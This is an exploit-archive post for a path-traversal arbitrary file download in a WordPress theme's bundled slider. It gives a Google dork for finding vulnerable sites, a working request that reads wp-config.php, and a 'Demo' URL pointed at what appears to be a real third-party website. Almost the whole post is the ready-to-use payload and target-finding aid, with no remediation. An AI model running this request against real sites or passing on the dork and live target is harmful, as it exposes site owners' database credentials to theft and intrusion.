id: 22596
date: 09/05/2014
title: WordPress The Retailer theme Arbitrary File Download Vulnerability
author: JK0x00
cves: 

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Google Dork: inurl:/wp-content/themes/theretailer/
# Greetz to : All Egy-Shell Team Members
++++++++++++++++++++++++++++++++++++++++++++++++++++++
poc :
http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Demo:
http://www.jangin.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2023-03-26]  #